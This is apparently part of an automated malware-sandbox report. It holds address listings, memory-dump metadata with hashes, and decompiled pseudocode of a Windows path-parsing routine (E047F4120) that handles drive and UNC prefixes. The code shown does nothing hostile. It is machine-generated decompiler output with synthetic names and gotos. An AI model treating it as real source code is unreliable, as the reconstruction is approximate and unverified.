                                                        0x048a5d2f
                                                        0x048a5d2f
                                                        0x048a5d33
                                                        0x048a5d3d
                                                        0x048a5d49
                                                        0x048a5d4b
                                                        0x00000000
                                                        0x00000000
                                                        0x048a5d5a
                                                        0x048a5d5d
                                                        0x048a5d60
                                                        0x00000000
                                                        0x00000000
                                                        0x048a5d66
                                                        0x048a5d69
                                                        0x00000000
                                                        0x00000000
                                                        0x048a5d6f
                                                        0x048a5d6f
                                                        0x048a5d73
                                                        0x048a5d79
                                                        0x048a5d7f
                                                        0x048a5d86
                                                        0x048a5d95
                                                        0x048a5d98
                                                        0x048a5dba
                                                        0x048a5dcb
                                                        0x048a5dce
                                                        0x048a5dd3
                                                        0x048a5dd6
                                                        0x048a5dd8
                                                        0x048a5de6
                                                        0x048a5dec
                                                        0x048a5dee
                                                        0x048a5df1
                                                        0x048a5df3
                                                        0x048a635a
                                                        0x048a635a
                                                        0x00000000
                                                        0x048a635a
                                                        0x048a5dfe
                                                        0x048a5e02
                                                        0x048a5e05
                                                        0x048a5e07
                                                        0x048a5e10
                                                        0x048a5e13
                                                        0x048a5e1b
                                                        0x048a5e1c
                                                        0x048a5e21
                                                        0x048a5e22
                                                        0x048a5e23
                                                        0x048a5e25
                                                        0x048a5e2a
                                                        0x048a5e2c
                                                        0x048a5e2e
                                                        0x048a5e36
                                                        0x048a5e39
                                                        0x048a5e42
                                                        0x048a5e47
                                                        0x048a5e4d
                                                        0x048a5e54
                                                        0x048a5e54
                                                        0x048a5e54
                                                        0x048a5e2e
                                                        0x048a5e5c
                                                        0x048a5e5f
                                                        0x048a5e62
                                                        0x048a5e64
                                                        0x048a5e6b
                                                        0x048a5e70
                                                        0x048a5e7a
                                                        0x048a5e7a
                                                        0x048a5e7a
                                                        0x048a5e6b
                                                        0x048a5e7e
                                                        0x048a5e7f
                                                        0x048a5e7f
                                                        0x048a5e81
                                                        0x048a5e87
                                                        0x048a5e8b
                                                        0x048a5e8c
                                                        0x048a5e8c
                                                        0x048a5e8c
                                                        0x048a5e9a
                                                        0x048a5e9c
                                                        0x048a5ea2
                                                        0x048a5ea6
                                                        0x048a5f50
                                                        0x048a5f50
                                                        0x048a5f57
                                                        0x048a5f66
                                                        0x048a5f66
                                                        0x048a5f66
                                                        0x048a5f68
                                                        0x048a5f6a
                                                        0x048a63d0
                                                        0x00000000
                                                        0x048a5f70
                                                        0x048a5f70
                                                        0x048a5f91
                                                        0x048a5f9c
                                                        0x048a5f9e
                                                        0x048a5fa4
                                                        0x048a5fa6
                                                        0x048a638c
                                                        0x048a6392
                                                        0x048a63a1
                                                        0x048a63a7
                                                        0x048a63af
                                                        0x048a63af
                                                        0x048a63bd
                                                        0x048a63d8
                                                        0x00000000
                                                        0x048a63d8
                                                        0x048a5fac
                                                        0x048a5fb2
                                                        0x048a5fb4
                                                        0x048a5fbd
                                                        0x048a5fc6
                                                        0x048a5fce
                                                        0x048a5fd4
                                                        0x048a5fdc
                                                        0x048a5fec
                                                        0x048a5fed
                                                        0x048a5fee
                                                        0x048a5fef
                                                        0x048a5ff9
                                                        0x048a5ffa
                                                        0x048a5ffb
                                                        0x048a5ffc
                                                        0x048a6000
                                                        0x048a6004
                                                        0x048a6012
                                                        0x048a6012
                                                        0x048a6018
                                                        0x048a6019
                                                        0x048a601a
                                                        0x048a601b
                                                        0x048a601c
                                                        0x048a6020
                                                        0x048a6059
                                                        0x048a605c
                                                        0x048a6061
                                                        0x048a6061
                                                        0x048a6022
                                                        0x048a6022
                                                        0x048a6022
                                                        0x048a6025
                                                        0x048a602a
                                                        0x048a602b
                                                        0x048a6031
                                                        0x048a6037
                                                        0x048a6038
                                                        0x048a603e
                                                        0x048a6048
                                                        0x048a6049
                                                        0x048a604a
                                                        0x048a604b
                                                        0x048a604c
                                                        0x048a604d
                                                        0x048a6053
                                                        0x048a6054
                                                        0x048a6054
                                                        0x048a6062
                                                        0x048a6065
                                                        0x048a6067
                                                        0x048a606a
                                                        0x048a6070
                                                        0x048a6075
                                                        0x048a6076
                                                        0x048a6081
                                                        0x048a6087
                                                        0x048a6095
                                                        0x048a6099
                                                        0x048a609e
                                                        0x048a60a4
                                                        0x048a60ae
                                                        0x048a60b0
                                                        0x048a60b3
                                                        0x048a60b6
                                                        0x048a60b8
                                                        0x048a60ba
                                                        0x048a60ba
                                                        0x048a60ba
                                                        0x048a60ba
                                                        0x048a60be
                                                        0x048a60c0
                                                        0x048a60c5
                                                        0x048a60c5
                                                        0x048a60c5
                                                        0x048a60c6
                                                        0x048a60cd
                                                        0x048a6114
                                                        0x048a60cf
                                                        0x048a60cf
                                                        0x048a60d4
                                                        0x048a60d5
                                                        0x048a60da
                                                        0x048a60db
                                                        0x048a60e1
                                                        0x048a60e2
                                                        0x048a60e8
                                                        0x048a60f8
                                                        0x048a60fd
                                                        0x048a60fe
                                                        0x048a6102
                                                        0x048a6104
                                                        0x048a6107
                                                        0x048a6109
                                                        0x048a610b
                                                        0x048a610b
                                                        0x048a610b
                                                        0x048a610b
                                                        0x048a610f
                                                        0x048a610f
                                                        0x048a6117
                                                        0x048a611a
                                                        0x048a611f
                                                        0x048a6125
                                                        0x048a6134
                                                        0x048a6139
                                                        0x048a613f
                                                        0x048a6146
                                                        0x048a6148
                                                        0x048a614b
                                                        0x048a614d
                                                        0x048a614f
                                                        0x048a614f
                                                        0x048a614f
                                                        0x048a614f
                                                        0x048a6153
                                                        0x048a6159
                                                        0x048a6159
                                                        0x048a615c
                                                        0x048a6163
                                                        0x048a6169
                                                        0x048a616c
                                                        0x048a6172
                                                        0x048a6181
                                                        0x048a6186
                                                        0x048a6187
                                                        0x048a618b
                                                        0x048a6191
                                                        0x048a6195
                                                        0x048a61a3
                                                        0x048a61bb
                                                        0x048a61c0
                                                        0x048a61c3
                                                        0x048a61cc
                                                        0x048a61d0
                                                        0x048a61dc
                                                        0x048a61de
                                                        0x048a61e1
                                                        0x048a61e4
                                                        0x048a61e6
                                                        0x048a61e8
                                                        0x048a61e8
                                                        0x048a61e8
                                                        0x048a61e8
                                                        0x048a61e6
                                                        0x048a61ec
                                                        0x048a61f3
                                                        0x048a6203
                                                        0x048a6209
                                                        0x048a620a
                                                        0x048a6216
                                                        0x048a621d
                                                        0x048a6227
                                                        0x048a6241
                                                        0x048a6246
                                                        0x048a624c
                                                        0x048a6257
                                                        0x048a6259
                                                        0x048a625c
                                                        0x048a625e
                                                        0x048a6260
                                                        0x048a6260
                                                        0x048a6260
                                                        0x048a6260
                                                        0x048a625e
                                                        0x048a6264
                                                        0x048a6267
                                                        0x048a6269
                                                        0x048a6315
                                                        0x048a6315
                                                        0x048a631b
                                                        0x048a631e
                                                        0x048a6324
                                                        0x048a6327
                                                        0x048a632f
                                                        0x048a6330
                                                        0x048a6333
                                                        0x048a633a
                                                        0x048a633c
                                                        0x048a6335
                                                        0x048a6335
                                                        0x048a6335
                                                        0x048a633f
                                                        0x048a6342
                                                        0x048a634c
                                                        0x048a6352
                                                        0x048a6355
                                                        0x048a6355
                                                        0x048a6359
                                                        0x00000000
                                                        0x048a626f
                                                        0x048a6275
                                                        0x048a6275
                                                        0x048a6278
                                                        0x048a627e
                                                        0x048a627e
                                                        0x048a6281
                                                        0x048a6287
                                                        0x048a628d
                                                        0x048a6298
                                                        0x048a629c
                                                        0x048a62a2
                                                        0x048a629e
                                                        0x048a629e
                                                        0x048a629e
                                                        0x048a62a7
                                                        0x048a62a7
                                                        0x048a62aa
                                                        0x048a62b0
                                                        0x048a62f0
                                                        0x048a62f0
                                                        0x048a62f2
                                                        0x048a62f8
                                                        0x048a62fd
                                                        0x048a62b2
                                                        0x048a62b2
                                                        0x048a62b2
                                                        0x048a62b5
                                                        0x048a62dd
                                                        0x048a62e2
                                                        0x048a62e5
                                                        0x048a62b7
                                                        0x048a62b8
                                                        0x048a62bb
                                                        0x048a62bd
                                                        0x048a62c0
                                                        0x048a62c4
                                                        0x048a62cd
                                                        0x048a62cd
                                                        0x048a62c0
                                                        0x048a62bb
                                                        0x048a62b5
                                                        0x048a6302
                                                        0x048a6303
                                                        0x048a6305
                                                        0x048a6305
                                                        0x048a6305
                                                        0x048a630c
                                                        0x048a630c
                                                        0x00000000
                                                        0x048a627e
                                                        0x048a6269
                                                        0x048a5eac
                                                        0x048a5ebb
                                                        0x048a5ebe
                                                        0x048a5ecb
                                                        0x048a5ecb
                                                        0x048a5ece
                                                        0x048a5ece
                                                        0x048a5ed4
                                                        0x048a5ed7
                                                        0x048a5ed9
                                                        0x048a5edb
                                                        0x048a5edb
                                                        0x048a5ee1
                                                        0x048a5ee1
                                                        0x048a5ee3
                                                        0x048a5f20
                                                        0x048a5f20
                                                        0x048a5ee5
                                                        0x048a5ee5
                                                        0x048a5ee5
                                                        0x048a5ee8
                                                        0x048a5f11
                                                        0x048a5f18
                                                        0x048a5eea
                                                        0x048a5eea
                                                        0x048a5eed
                                                        0x048a5ef2
                                                        0x048a5ef8
                                                        0x048a5efb
                                                        0x048a5f0a
                                                        0x048a5f0a
                                                        0x048a5eed
                                                        0x048a5ee8
                                                        0x048a5f22
                                                        0x048a5f28
                                                        0x00000000
                                                        0x00000000
                                                        0x048a5f30
                                                        0x048a5f31
                                                        0x048a5f37
                                                        0x048a5f3a
                                                        0x048a5f3d
                                                        0x048a5f44
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048a5f46
                                                        0x048a5f48
                                                        0x048a5f4d
                                                        0x00000000
                                                        0x048a5f4d
                                                        0x048a5dda
                                                        0x048a5ddf
                                                        0x00000000
                                                        0x048a5ddf
                                                        0x048a5dd8
                                                        0x048a5da7
                                                        0x048a5da9
                                                        0x048a5dac
                                                        0x048a5dae
                                                        0x00000000
                                                        0x048a5db4
                                                        0x048a5db4
                                                        0x00000000
                                                        0x048a5db4
                                                        0x048a5dae
                                                        0x048a5d88
                                                        0x048a5d8d
                                                        0x048a6363
                                                        0x048a6369
                                                        0x048a636a
                                                        0x048a6370
                                                        0x048a6372
                                                        0x048a637a
                                                        0x048a637b
                                                        0x048a637d
                                                        0x00000000
                                                        0x00000000
                                                        0x048a637f
                                                        0x048a6385
                                                        0x00000000
                                                        0x048a6385
                                                        0x048a5d38
                                                        0x048a5d3b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048a5d3b
                                                        0x048a5d27
                                                        0x048a5d29
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048a6360
                                                        0x00000000
                                                        0x048a6360
                                                        0x048a5c10
                                                        0x048a5c10
                                                        0x048a63da
                                                        0x048a63e5
                                                        0x048a63e5

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b7e118e958c7392848bc3221641e730e6ae72d06b36d2be5219a581cc0d22e5e
                                                        • Instruction ID: 9fc9ee59970ef31656cd281586ad03719292638c8d6690825deaf65ce02fb747
                                                        • Opcode Fuzzy Hash: b7e118e958c7392848bc3221641e730e6ae72d06b36d2be5219a581cc0d22e5e
                                                        • Instruction Fuzzy Hash: 45427075D00229DFEB20CF68C880BA9B7B1FF45304F1486AAD94DEB245E7B4A995CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047F4120, Relevance: .4, Instructions: 444COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 92%
                                                        			E047F4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x48cd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0480F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E047F6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L047F4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E047F6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M047F45F8))) {
												case 0:
													_v568 = 0x47b1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x47b11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L047F4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0481F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0481F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E047D52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E047EEB70(1, 0x48c79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E047EAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E048195D0();
																			L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0481B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E04813D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0481B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                        0x047f4128
                                                        0x047f4135
                                                        0x047f413c
                                                        0x047f4141
                                                        0x047f4145
                                                        0x047f4147
                                                        0x047f414e
                                                        0x047f4151
                                                        0x047f4159
                                                        0x047f415c
                                                        0x047f4160
                                                        0x047f4164
                                                        0x047f4168
                                                        0x047f416c
                                                        0x047f417f
                                                        0x047f4181
                                                        0x047f446a
                                                        0x047f446a
                                                        0x047f418c
                                                        0x047f4195
                                                        0x047f4199
                                                        0x047f4432
                                                        0x047f4439
                                                        0x047f443d
                                                        0x047f4442
                                                        0x047f4447
                                                        0x00000000
                                                        0x047f419f
                                                        0x047f41a3
                                                        0x047f41b1
                                                        0x047f41b9
                                                        0x047f41bd
                                                        0x047f45db
                                                        0x047f45db
                                                        0x00000000
                                                        0x047f41c3
                                                        0x047f41c3
                                                        0x047f41ce
                                                        0x047f41d4
                                                        0x0483e138
                                                        0x0483e13e
                                                        0x0483e169
                                                        0x0483e16d
                                                        0x0483e19e
                                                        0x0483e16f
                                                        0x0483e16f
                                                        0x0483e175
                                                        0x0483e179
                                                        0x0483e18f
                                                        0x0483e193
                                                        0x00000000
                                                        0x0483e199
                                                        0x00000000
                                                        0x0483e199
                                                        0x0483e193
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x047f41da
                                                        0x047f41da
                                                        0x047f41df
                                                        0x047f41e4
                                                        0x047f41ec
                                                        0x047f4203
                                                        0x047f4207
                                                        0x0483e1fd
                                                        0x047f4222
                                                        0x047f4226
                                                        0x0483e1f3
                                                        0x0483e1f3
                                                        0x047f422c
                                                        0x047f422c
                                                        0x047f4233
                                                        0x0483e1ed
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x047f4239
                                                        0x047f4239
                                                        0x047f4239
                                                        0x047f4239
                                                        0x047f4233
                                                        0x047f4226
                                                        0x047f41ee
                                                        0x047f41ee
                                                        0x047f41f4
                                                        0x047f4575
                                                        0x0483e1b1
                                                        0x0483e1b1
                                                        0x00000000
                                                        0x047f457b
                                                        0x047f457b
                                                        0x047f4582
                                                        0x0483e1ab
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x047f4588
                                                        0x047f4588
                                                        0x047f458c
                                                        0x0483e1c4
                                                        0x0483e1c4
                                                        0x00000000
                                                        0x047f4592
                                                        0x047f4592
                                                        0x047f4599
                                                        0x0483e1be
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x047f459f
                                                        0x047f459f
                                                        0x047f45a3
                                                        0x0483e1d7
                                                        0x0483e1e4
                                                        0x00000000
                                                        0x047f45a9
                                                        0x047f45a9
                                                        0x047f45b0
                                                        0x0483e1d1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x047f45b6
                                                        0x047f45b6
                                                        0x047f45b6
                                                        0x00000000
                                                        0x047f45b6
                                                        0x047f45b0
                                                        0x047f45a3
                                                        0x047f4599
                                                        0x047f458c
                                                        0x047f4582
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x047f41f4
                                                        0x047f423e
                                                        0x047f4241
                                                        0x047f45c0
                                                        0x047f45c4
                                                        0x00000000
                                                        0x047f45ca
                                                        0x047f45ca
                                                        0x00000000
                                                        0x0483e207
                                                        0x0483e20f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x047f45d1
                                                        0x00000000
                                                        0x00000000
                                                        0x047f45ca
                                                        0x00000000
                                                        0x047f4247
                                                        0x047f4247
                                                        0x047f4247
                                                        0x047f4249
                                                        0x047f4249
                                                        0x047f4249
                                                        0x047f4251
                                                        0x047f4251
                                                        0x047f4257
                                                        0x047f425f
                                                        0x047f426e
                                                        0x047f4270
                                                        0x047f427a
                                                        0x0483e219
                                                        0x0483e219
                                                        0x047f4280
                                                        0x047f4282
                                                        0x047f4456
                                                        0x047f45ea
                                                        0x00000000
                                                        0x047f45f0
                                                        0x0483e223
                                                        0x00000000
                                                        0x0483e223
                                                        0x047f445c
                                                        0x047f445c
                                                        0x00000000
                                                        0x047f445c
                                                        0x00000000
                                                        0x047f4288
                                                        0x047f428c
                                                        0x0483e298
                                                        0x047f4292
                                                        0x047f4292
                                                        0x047f429e
                                                        0x047f42a3
                                                        0x047f42a7
                                                        0x047f42ac
                                                        0x0483e22d
                                                        0x047f42b2
                                                        0x047f42b2
                                                        0x047f42b9
                                                        0x047f42bc
                                                        0x047f42c2
                                                        0x047f42ca
                                                        0x047f42cd
                                                        0x047f42cd
                                                        0x047f42d4
                                                        0x047f433f
                                                        0x047f433f
                                                        0x047f42d6
                                                        0x047f42d6
                                                        0x047f42d9
                                                        0x047f42dd
                                                        0x047f42eb
                                                        0x0483e23a
                                                        0x047f42f1
                                                        0x047f4305
                                                        0x047f430d
                                                        0x047f4315
                                                        0x047f4318
                                                        0x047f431f
                                                        0x047f4322
                                                        0x047f432e
                                                        0x047f433b
                                                        0x047f433b
                                                        0x00000000
                                                        0x047f432e
                                                        0x047f42eb
                                                        0x047f434c
                                                        0x047f434e
                                                        0x047f4352
                                                        0x047f4359
                                                        0x047f435e
                                                        0x047f4361
                                                        0x047f436e
                                                        0x047f438a
                                                        0x047f438e
                                                        0x047f4396
                                                        0x047f439e
                                                        0x047f43a1
                                                        0x047f43ad
                                                        0x047f43bb
                                                        0x047f43bb
                                                        0x047f43ad
                                                        0x047f436e
                                                        0x047f43bf
                                                        0x047f43c5
                                                        0x047f4463
                                                        0x047f4463
                                                        0x047f43ce
                                                        0x047f43d5
                                                        0x047f43d9
                                                        0x047f43df
                                                        0x047f4475
                                                        0x047f4479
                                                        0x047f4491
                                                        0x047f4491
                                                        0x047f4479
                                                        0x047f43e5
                                                        0x047f43eb
                                                        0x047f43f4
                                                        0x047f43f6
                                                        0x047f43f9
                                                        0x047f43fc
                                                        0x047f43ff
                                                        0x047f44e8
                                                        0x047f44ed
                                                        0x047f44f3
                                                        0x0483e247
                                                        0x00000000
                                                        0x047f44f9
                                                        0x047f4504
                                                        0x047f4508
                                                        0x047f450f
                                                        0x0483e269
                                                        0x00000000
                                                        0x047f4515
                                                        0x047f4519
                                                        0x047f4531
                                                        0x047f4534
                                                        0x047f4537
                                                        0x047f453e
                                                        0x047f4541
                                                        0x047f454a
                                                        0x0483e255
                                                        0x0483e255
                                                        0x0483e25b
                                                        0x0483e25e
                                                        0x0483e261
                                                        0x0483e261
                                                        0x047f4555
                                                        0x047f4559
                                                        0x047f455d
                                                        0x0483e26d
                                                        0x0483e270
                                                        0x0483e274
                                                        0x0483e27a
                                                        0x0483e27d
                                                        0x0483e28e
                                                        0x0483e28e
                                                        0x047f4563
                                                        0x047f4563
                                                        0x047f4569
                                                        0x047f4569
                                                        0x00000000
                                                        0x047f455d
                                                        0x047f450f
                                                        0x00000000
                                                        0x047f44f3
                                                        0x047f43ff
                                                        0x047f4405
                                                        0x047f4405
                                                        0x047f4405
                                                        0x047f42ac
                                                        0x047f428c
                                                        0x047f4282
                                                        0x047f4407
                                                        0x047f440d
                                                        0x0483e2af
                                                        0x0483e2af
                                                        0x047f4413
                                                        0x047f4413
                                                        0x00000000
                                                        0x047f41d4
